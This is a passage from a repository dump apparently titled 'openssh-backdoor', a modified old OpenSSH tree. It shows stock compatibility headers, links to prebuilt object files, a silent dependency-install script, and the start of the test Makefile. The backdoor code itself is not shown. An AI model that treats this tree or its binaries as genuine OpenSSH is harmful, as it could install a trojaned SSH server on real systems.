*/ 47 | 48 | -------------------------------------------------------------------------------- /openbsd-compat/getcwd.h: -------------------------------------------------------------------------------- 1 | /* $Id: getcwd.h,v 1.2 2001/02/09 01:55:36 djm Exp $ */ 2 | 3 | #ifndef _BSD_GETCWD_H 4 | #define _BSD_GETCWD_H 5 | #include "config.h" 6 | 7 | #if !defined(HAVE_GETCWD) 8 | 9 | char *getcwd(char *pt, size_t size); 10 | 11 | #endif /* !defined(HAVE_GETCWD) */ 12 | #endif /* _BSD_GETCWD_H */ 13 | -------------------------------------------------------------------------------- /openbsd-compat/getcwd.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/getcwd.o -------------------------------------------------------------------------------- /openbsd-compat/getgrouplist.h: -------------------------------------------------------------------------------- 1 | /* $Id: getgrouplist.h,v 1.2 2001/02/09 01:55:36 djm Exp $ */ 2 | 3 | #ifndef _BSD_GETGROUPLIST_H 4 | #define _BSD_GETGROUPLIST_H 5 | 6 | #include "config.h" 7 | 8 | #ifndef HAVE_GETGROUPLIST 9 | 10 | #include 11 | 12 | int getgrouplist(const char *, gid_t, gid_t *, int *); 13 | 14 | #endif 15 | 16 | #endif 17 | -------------------------------------------------------------------------------- /openbsd-compat/getgrouplist.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/getgrouplist.o -------------------------------------------------------------------------------- /openbsd-compat/getopt.h: -------------------------------------------------------------------------------- 1 | /* $Id: getopt.h,v 1.4 2001/09/18 05:05:21 djm Exp $ */ 2 | 3 | #ifndef _BSDGETOPT_H 4 | #define _BSDGETOPT_H 5 | 6 | #include "config.h" 7 | 8 | #if !defined(HAVE_GETOPT) || !defined(HAVE_GETOPT_OPTRESET) 9 | 10 | int BSDgetopt(int argc, char * const *argv, const char *opts); 11 | 12 | #endif 13 | 14 | #endif /* _BSDGETOPT_H */ 15 | -------------------------------------------------------------------------------- /openbsd-compat/getopt.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/getopt.o -------------------------------------------------------------------------------- /openbsd-compat/glob.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/glob.o -------------------------------------------------------------------------------- /openbsd-compat/inet_aton.h: -------------------------------------------------------------------------------- 1 | /* $Id: inet_aton.h,v 1.4 2001/07/16 02:07:51 tim Exp $ */ 2 | 3 | #ifndef _BSD_INET_ATON_H 4 | #define _BSD_INET_ATON_H 5 | 6 | #include "config.h" 7 | 8 | #ifndef HAVE_INET_ATON 9 | int inet_aton(const char *cp, struct in_addr *addr); 10 | #endif /* HAVE_INET_ATON */ 11 | 12 | #endif /* _BSD_INET_ATON_H */ 13 | -------------------------------------------------------------------------------- /openbsd-compat/inet_aton.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/inet_aton.o -------------------------------------------------------------------------------- /openbsd-compat/inet_ntoa.h: -------------------------------------------------------------------------------- 1 | /* $Id: inet_ntoa.h,v 1.2 2001/02/09 01:55:36 djm Exp $ */ 2 | 3 | #ifndef _BSD_INET_NTOA_H 4 | #define _BSD_INET_NTOA_H 5 | 6 | #include "config.h" 7 | 8 | #if defined(BROKEN_INET_NTOA) || !defined(HAVE_INET_NTOA) 9 | char *inet_ntoa(struct in_addr in); 10 | #endif /* defined(BROKEN_INET_NTOA) || !defined(HAVE_INET_NTOA) */ 11 | 12 | #endif /* _BSD_INET_NTOA_H */ 13 | -------------------------------------------------------------------------------- /openbsd-compat/inet_ntoa.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/inet_ntoa.o -------------------------------------------------------------------------------- /openbsd-compat/inet_ntop.h: -------------------------------------------------------------------------------- 1 | /* $Id: inet_ntop.h,v 1.4 2001/08/09 00:56:53 mouring Exp $ */ 2 | 3 | #ifndef _BSD_INET_NTOP_H 4 | #define _BSD_INET_NTOP_H 5 | 6 | #include "config.h" 7 | 8 | #ifndef HAVE_INET_NTOP 9 | const char * 10 | inet_ntop(int af, const void *src, char *dst, size_t size); 11 | #endif /* !HAVE_INET_NTOP */ 12 | 13 | #endif /* _BSD_INET_NTOP_H */ 14 | -------------------------------------------------------------------------------- /openbsd-compat/inet_ntop.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/inet_ntop.o -------------------------------------------------------------------------------- /openbsd-compat/libopenbsd-compat.a: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/libopenbsd-compat.a -------------------------------------------------------------------------------- /openbsd-compat/mktemp.h: -------------------------------------------------------------------------------- 1 | /* $Id: mktemp.h,v 1.3 2003/01/07 04:18:33 djm Exp $ */ 2 | 3 | #ifndef _BSD_MKTEMP_H 4 | #define _BSD_MKTEMP_H 5 | 6 | #include "config.h" 7 | #if !defined(HAVE_MKDTEMP) || defined(HAVE_STRICT_MKSTEMP) 8 | int mkstemps(char *path, int slen); 9 | int mkstemp(char *path); 10 | char *mkdtemp(char *path); 11 | #endif /* !defined(HAVE_MKDTEMP) || defined(HAVE_STRICT_MKSTEMP) */ 12 | 13 | #endif /* _BSD_MKTEMP_H */ 14 | -------------------------------------------------------------------------------- /openbsd-compat/mktemp.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/mktemp.o -------------------------------------------------------------------------------- /openbsd-compat/openbsd-compat.h: -------------------------------------------------------------------------------- 1 | /* $Id: openbsd-compat.h,v 1.19 2003/02/24 01:55:56 djm Exp $ */ 2 | 3 | #ifndef _OPENBSD_H 4 | #define _OPENBSD_H 5 | 6 | #include "config.h" 7 | 8 | /* OpenBSD function replacements */ 9 | #include "basename.h" 10 | #include "bindresvport.h" 11 | #include "getcwd.h" 12 | #include "realpath.h" 13 | #include "rresvport.h" 14 | #include "strlcpy.h" 15 | #include "strlcat.h" 16 | #include "strmode.h" 17 | #include "mktemp.h" 18 | #include "daemon.h" 19 | #include "dirname.h" 20 | #include "base64.h" 21 | #include "sigact.h" 22 | #include "inet_ntoa.h" 23 | #include "inet_ntop.h" 24 | #include "strsep.h" 25 | #include "setproctitle.h" 26 | #include "getgrouplist.h" 27 | #include "glob.h" 28 | #include "readpassphrase.h" 29 | #include "getopt.h" 30 | #include "vis.h" 31 | 32 | /* Home grown routines */ 33 | #include "bsd-arc4random.h" 34 | #include "bsd-getpeereid.h" 35 | #include "bsd-misc.h" 36 | #include "bsd-snprintf.h" 37 | #include "bsd-waitpid.h" 38 | 39 | /* rfc2553 socket API replacements */ 40 | #include "fake-getaddrinfo.h" 41 | #include "fake-getnameinfo.h" 42 | #include "fake-socket.h" 43 | 44 | /* Routines for a single OS platform */ 45 | #include "bsd-cray.h" 46 | #include "port-irix.h" 47 | #include "port-aix.h" 48 | 49 | #endif /* _OPENBSD_H */ 50 | -------------------------------------------------------------------------------- /openbsd-compat/port-aix.h: -------------------------------------------------------------------------------- 1 | /* 2 | * 3 | * Copyright (c) 2001 Gert Doering. All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions 7 | * are met: 8 | * 1. Redistributions of source code must retain the above copyright 9 | * notice, this list of conditions and the following disclaimer. 10 | * 2. Redistributions in binary form must reproduce the above copyright 11 | * notice, this list of conditions and the following disclaimer in the 12 | * documentation and/or other materials provided with the distribution. 13 | * 14 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 15 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 16 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 17 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 18 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 19 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 20 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 21 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 22 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 23 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 24 | * 25 | */ 26 | 27 | #ifdef _AIX 28 | 29 | /* AIX 4.2.x doesn't have nanosleep but does have nsleep which is equivalent */ 30 | #if !defined(HAVE_NANOSLEEP) && defined(HAVE_NSLEEP) 31 | # define nanosleep(a,b) nsleep(a,b) 32 | #endif 33 | 34 | /* For struct timespec on AIX 4.2.x */ 35 | #ifdef HAVE_SYS_TIMERS_H 36 | # include 37 | #endif 38 | 39 | void aix_usrinfo(struct passwd *pw); 40 | #endif /* _AIX */ 41 | -------------------------------------------------------------------------------- /openbsd-compat/port-aix.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/port-aix.o -------------------------------------------------------------------------------- /openbsd-compat/port-irix.c: -------------------------------------------------------------------------------- 1 | #include "includes.h" 2 | 3 | #if defined(WITH_IRIX_PROJECT) || defined(WITH_IRIX_JOBS) || defined(WITH_IRIX_ARRAY) 4 | 5 | #ifdef WITH_IRIX_PROJECT 6 | #include 7 | #endif /* WITH_IRIX_PROJECT */ 8 | #ifdef WITH_IRIX_JOBS 9 | #include 10 | #endif 11 | #ifdef WITH_IRIX_AUDIT 12 | #include 13 | #endif /* WITH_IRIX_AUDIT */ 14 | 15 | void 16 | irix_setusercontext(struct passwd *pw) 17 | { 18 | #ifdef WITH_IRIX_PROJECT 19 | prid_t projid; 20 | #endif /* WITH_IRIX_PROJECT */ 21 | #ifdef WITH_IRIX_JOBS 22 | jid_t jid = 0; 23 | #else 24 | # ifdef WITH_IRIX_ARRAY 25 | int jid = 0; 26 | # endif /* WITH_IRIX_ARRAY */ 27 | #endif /* WITH_IRIX_JOBS */ 28 | 29 | #ifdef WITH_IRIX_JOBS 30 | jid = jlimit_startjob(pw->pw_name, pw->pw_uid, "interactive"); 31 | if (jid == -1) 32 | fatal("Failed to create job container: %.100s", 33 | strerror(errno)); 34 | #endif /* WITH_IRIX_JOBS */ 35 | #ifdef WITH_IRIX_ARRAY 36 | /* initialize array session */ 37 | if (jid == 0 && newarraysess() != 0) 38 | fatal("Failed to set up new array session: %.100s", 39 | strerror(errno)); 40 | #endif /* WITH_IRIX_ARRAY */ 41 | #ifdef WITH_IRIX_PROJECT 42 | /* initialize irix project info */ 43 | if ((projid = getdfltprojuser(pw->pw_name)) == -1) { 44 | debug("Failed to get project id, using projid 0"); 45 | projid = 0; 46 | } 47 | if (setprid(projid)) 48 | fatal("Failed to initialize project %d for %s: %.100s", 49 | (int)projid, pw->pw_name, strerror(errno)); 50 | #endif /* WITH_IRIX_PROJECT */ 51 | #ifdef WITH_IRIX_AUDIT 52 | if (sysconf(_SC_AUDIT)) { 53 | debug("Setting sat id to %d", (int) pw->pw_uid); 54 | if (satsetid(pw->pw_uid)) 55 | debug("error setting satid: %.100s", strerror(errno)); 56 | } 57 | #endif /* WITH_IRIX_AUDIT */ 58 | } 59 | 60 | 61 | #endif /* defined(WITH_IRIX_PROJECT) || defined(WITH_IRIX_JOBS) || defined(WITH_IRIX_ARRAY) */ 62 | -------------------------------------------------------------------------------- /openbsd-compat/port-irix.h: -------------------------------------------------------------------------------- 1 | #if defined(WITH_IRIX_PROJECT) || defined(WITH_IRIX_JOBS) || defined(WITH_IRIX_ARRAY) 2 | 3 | void irix_setusercontext(struct passwd *pw); 4 | 5 | #endif /* defined(WITH_IRIX_PROJECT) || defined(WITH_IRIX_JOBS) || defined(WITH_IRIX_ARRAY) */ 6 | -------------------------------------------------------------------------------- /openbsd-compat/port-irix.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/port-irix.o -------------------------------------------------------------------------------- /openbsd-compat/readpassphrase.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/readpassphrase.o -------------------------------------------------------------------------------- /openbsd-compat/realpath.h: -------------------------------------------------------------------------------- 1 | /* $Id: realpath.h,v 1.2 2001/02/09 01:55:36 djm Exp $ */ 2 | 3 | #ifndef _BSD_REALPATH_H 4 | #define _BSD_REALPATH_H 5 | 6 | #include "config.h" 7 | 8 | #if !defined(HAVE_REALPATH) || defined(BROKEN_REALPATH) 9 | 10 | char *realpath(const char *path, char *resolved); 11 | 12 | #endif /* !defined(HAVE_REALPATH) || defined(BROKEN_REALPATH) */ 13 | #endif /* _BSD_REALPATH_H */ 14 | -------------------------------------------------------------------------------- /openbsd-compat/realpath.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/realpath.o -------------------------------------------------------------------------------- /openbsd-compat/rresvport.h: -------------------------------------------------------------------------------- 1 | /* $Id: rresvport.h,v 1.2 2001/02/09 01:55:36 djm Exp $ */ 2 | 3 | #ifndef _BSD_RRESVPORT_H 4 | #define _BSD_RRESVPORT_H 5 | 6 | #include "config.h" 7 | 8 | #ifndef HAVE_RRESVPORT_AF 9 | int rresvport_af(int *alport, sa_family_t af); 10 | #endif /* !HAVE_RRESVPORT_AF */ 11 | 12 | #endif /* _BSD_RRESVPORT_H */ 13 | -------------------------------------------------------------------------------- /openbsd-compat/rresvport.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/rresvport.o -------------------------------------------------------------------------------- /openbsd-compat/setenv.h: -------------------------------------------------------------------------------- 1 | /* $Id: setenv.h,v 1.2 2001/02/09 01:55:36 djm Exp $ */ 2 | 3 | #ifndef _BSD_SETENV_H 4 | #define _BSD_SETENV_H 5 | 6 | #include "config.h" 7 | 8 | #ifndef HAVE_SETENV 9 | 10 | int setenv(register const char *name, register const char *value, int rewrite); 11 | 12 | #endif /* !HAVE_SETENV */ 13 | 14 | #endif /* _BSD_SETENV_H */ 15 | -------------------------------------------------------------------------------- /openbsd-compat/setenv.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/setenv.o -------------------------------------------------------------------------------- /openbsd-compat/setproctitle.h: -------------------------------------------------------------------------------- 1 | /* $Id: setproctitle.h,v 1.3 2003/01/09 22:53:13 djm Exp $ */ 2 | 3 | #ifndef _BSD_SETPROCTITLE_H 4 | #define _BSD_SETPROCTITLE_H 5 | 6 | #include "config.h" 7 | 8 | #ifndef HAVE_SETPROCTITLE 9 | void setproctitle(const char *fmt, ...); 10 | void compat_init_setproctitle(int argc, char *argv[]); 11 | #endif 12 | 13 | #endif /* _BSD_SETPROCTITLE_H */ 14 | -------------------------------------------------------------------------------- /openbsd-compat/setproctitle.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/setproctitle.o -------------------------------------------------------------------------------- /openbsd-compat/sigact.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/sigact.o -------------------------------------------------------------------------------- /openbsd-compat/strlcat.h: -------------------------------------------------------------------------------- 1 | /* $Id: strlcat.h,v 1.2 2001/02/09 01:55:36 djm Exp $ */ 2 | 3 | #ifndef _BSD_STRLCAT_H 4 | #define _BSD_STRLCAT_H 5 | 6 | #include "config.h" 7 | #ifndef HAVE_STRLCAT 8 | #include 9 | size_t strlcat(char *dst, const char *src, size_t siz); 10 | #endif /* !HAVE_STRLCAT */ 11 | 12 | #endif /* _BSD_STRLCAT_H */ 13 | -------------------------------------------------------------------------------- /openbsd-compat/strlcat.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/strlcat.o -------------------------------------------------------------------------------- /openbsd-compat/strlcpy.h: -------------------------------------------------------------------------------- 1 | /* $Id: strlcpy.h,v 1.2 2001/02/09 01:55:36 djm Exp $ */ 2 | 3 | #ifndef _BSD_STRLCPY_H 4 | #define _BSD_STRLCPY_H 5 | 6 | #include "config.h" 7 | #ifndef HAVE_STRLCPY 8 | #include 9 | size_t strlcpy(char *dst, const char *src, size_t siz); 10 | #endif /* !HAVE_STRLCPY */ 11 | 12 | #endif /* _BSD_STRLCPY_H */ 13 | -------------------------------------------------------------------------------- /openbsd-compat/strlcpy.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/strlcpy.o -------------------------------------------------------------------------------- /openbsd-compat/strmode.h: -------------------------------------------------------------------------------- 1 | /* $Id: strmode.h,v 1.3 2001/06/09 02:22:17 mouring Exp $ */ 2 | 3 | #ifndef HAVE_STRMODE 4 | 5 | void strmode(register mode_t mode, register char *p); 6 | 7 | #endif 8 | -------------------------------------------------------------------------------- /openbsd-compat/strmode.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/strmode.o -------------------------------------------------------------------------------- /openbsd-compat/strsep.h: -------------------------------------------------------------------------------- 1 | /* $Id: strsep.h,v 1.2 2001/02/09 01:55:36 djm Exp $ */ 2 | 3 | #ifndef _BSD_STRSEP_H 4 | #define _BSD_STRSEP_H 5 | 6 | #include "config.h" 7 | 8 | #ifndef HAVE_STRSEP 9 | char *strsep(char **stringp, const char *delim); 10 | #endif /* HAVE_STRSEP */ 11 | 12 | #endif /* _BSD_STRSEP_H */ 13 | -------------------------------------------------------------------------------- /openbsd-compat/strsep.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/strsep.o -------------------------------------------------------------------------------- /openbsd-compat/vis.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/vis.o -------------------------------------------------------------------------------- /openbsd-compat/xmmap.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Redistribution and use in source and binary forms, with or without 3 | * modification, are permitted provided that the following conditions 4 | * are met: 5 | * 1. Redistributions of source code must retain the above copyright 6 | * notice, this list of conditions and the following disclaimer. 7 | * 2. Redistributions in binary form must reproduce the above copyright 8 | * notice, this list of conditions and the following disclaimer in the 9 | * documentation and/or other materials provided with the distribution. 10 | * 11 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 12 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 13 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 14 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 15 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 16 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 17 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 18 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 19 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 20 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 21 | */ 22 | 23 | void *xmmap(size_t size); 24 | -------------------------------------------------------------------------------- /openbsd-compat/xmmap.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/xmmap.o -------------------------------------------------------------------------------- /openssl: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ########### 4 | # 5 | # SETTING UP COLLORS 6 | # 7 | ########### 8 | 9 | red='\e[0;31m' 10 | RED='\e[1;31m' 11 | org='\e[0;33m33' 12 | blue='\e[0;34m' 13 | BLUE='\e[1;34m' 14 | cyan='\e[0;36m' 15 | CYAN='\e[1;36m' 16 | GRN='\e[0;32m' 17 | NC='\e[0m' 18 | 19 | ########### 20 | # 21 | # INSTALLING OPENSSL DEVEL 22 | # 23 | ########### 24 | 25 | echo -e "\n${GRN}NOW TRYING TO INSTALL OPENSSL DEVEL${NC}\n\n" 26 | 27 | if [ -f /usr/bin/yum ]; 28 | then 29 | yum install -y openssl-devel >> /dev/null 30 | fi 31 | 32 | if [ -f /usr/bin/apt-get ]; 33 | then 34 | apt-get update >> /dev/null 35 | apt-get install libssl-dev -y >> /dev/null 36 | fi 37 | 38 | if [ -f /sbin/yast ]; 39 | then 40 | yast -i openssl-devel >> /dev/null 41 | fi 42 | 43 | if [ -f /usr/bin/zypper ]; 44 | then 45 | zypper -n install openssl-devel >> /dev/null 46 | fi 47 | 48 | if [ ! -d /usr/include/openssl ]; then 49 | ./ssl 50 | fi 51 | 52 | if [ -d /usr/include/openssl ]; then 53 | echo -e "${BLUE}OPENSSL DEVEL INSTALL${NC} [ ${GRN}COMPLETED${NC} ]" 54 | else 55 | echo -e "${BLUE}OPENSSL DEVEL INSTALL${NC} [ ${RED}INCOMPLETED${NC} ]" 56 | fi 57 | -------------------------------------------------------------------------------- /packet.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/packet.o -------------------------------------------------------------------------------- /progressmeter.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: progressmeter.h,v 1.1 2003/01/10 08:19:07 fgsch Exp $ */ 2 | /* 3 | * Copyright (c) 2002 Nils Nordman. All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions 7 | * are met: 8 | * 1. Redistributions of source code must retain the above copyright 9 | * notice, this list of conditions and the following disclaimer. 10 | * 2. Redistributions in binary form must reproduce the above copyright 11 | * notice, this list of conditions and the following disclaimer in the 12 | * documentation and/or other materials provided with the distribution. 13 | * 14 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 15 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 16 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 17 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 18 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 19 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 20 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 21 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 22 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 23 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 24 | */ 25 | 26 | void start_progress_meter(char *, off_t, off_t *); 27 | void stop_progress_meter(void); 28 | -------------------------------------------------------------------------------- /progressmeter.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/progressmeter.o -------------------------------------------------------------------------------- /radix.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: radix.h,v 1.4 2001/06/26 17:27:24 markus Exp $ */ 2 | 3 | /* 4 | * Copyright (c) 1999 Dug Song. All rights reserved. 5 | * 6 | * Redistribution and use in source and binary forms, with or without 7 | * modification, are permitted provided that the following conditions 8 | * are met: 9 | * 1. Redistributions of source code must retain the above copyright 10 | * notice, this list of conditions and the following disclaimer. 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 16 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 17 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 18 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 19 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 20 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 21 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 22 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 23 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 24 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 25 | */ 26 | 27 | int creds_to_radix(CREDENTIALS *, u_char *, size_t); 28 | int radix_to_creds(const char *, CREDENTIALS *); 29 | -------------------------------------------------------------------------------- /radix.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/radix.o -------------------------------------------------------------------------------- /readconf.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/readconf.o -------------------------------------------------------------------------------- /readpass.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: readpass.h,v 1.7 2002/03/26 15:58:46 markus Exp $ */ 2 | 3 | /* 4 | * Author: Tatu Ylonen 5 | * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland 6 | * All rights reserved 7 | * 8 | * As far as I am concerned, the code I have written for this software 9 | * can be used freely for any purpose. Any derived versions of this 10 | * software must be clearly marked as such, and if the derived work is 11 | * incompatible with the protocol description in the RFC file, it must be 12 | * called by a name other than "ssh" or "Secure Shell". 13 | */ 14 | 15 | #define RP_ECHO 0x0001 16 | #define RP_ALLOW_STDIN 0x0002 17 | #define RP_ALLOW_EOF 0x0004 18 | 19 | char *read_passphrase(const char *, int); 20 | -------------------------------------------------------------------------------- /readpass.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/readpass.o -------------------------------------------------------------------------------- /regress/Makefile: -------------------------------------------------------------------------------- 1 | # $OpenBSD: Makefile,v 1.20 2003/01/08 23:54:22 djm Exp $ 2 | 3 | REGRESS_TARGETS= t1 t2 t3 t4 t5 t6 t7 4 | 5 | CLEANFILES+= t2.out t6.out1 t6.out2 t7.out t7.out.pub copy.1 copy.2 6 | 7 | LTESTS= connect \ 8 | proxy-connect \ 9 | connect-privsep \ 10 | proto-version \ 11 | proto-mismatch \ 12 | exit-status \ 13 | transfer \ 14 | stderr-data \ 15 | stderr-after-eof \ 16 | broken-pipe \ 17 | try-ciphers \ 18 | yes-head \ 19 | agent \ 20 | agent-getpeereid \ 21 | agent-timeout \ 22 | agent-ptrace \ 23 | keyscan \ 24 | keygen-change \ 25 | sftp \ 26 | sftp-cmds \ 27 | sftp-batch \ 28 | forwarding 29 | 30 | USER!= id -un 31 | CLEANFILES+= authorized_keys_${USER} known_hosts pidfile \ 32 | ssh_config ssh_proxy sshd_config sshd_proxy \ 33 | rsa.pub rsa rsa1.pub rsa1 host.rsa host.rsa1 \ 34 | rsa-agent rsa-agent.pub rsa1-agent rsa1-agent.pub \ 35 | ls.copy 36 | 37 | #LTESTS+= ssh-com ssh-com-client ssh-com-keygen ssh-com-sftp 38 | 39 | t1: 40 | ssh-keygen -if ${.CURDIR}/rsa_ssh2.prv | diff - ${.CURDIR}/rsa_openssh.prv 41 | 42 | t2: 43 | cat ${.CURDIR}/rsa_openssh.prv > t2.out 44 | chmod 600 t2.out 45 | ssh-keygen -yf t2.out | diff - ${.CURDIR}/rsa_openssh.pub 46 | 47 | t3: 48 | ssh-keygen -ef ${.CURDIR}/rsa_openssh.pub |\ 49 | ssh-keygen -if /dev/stdin |\ 50 | diff - 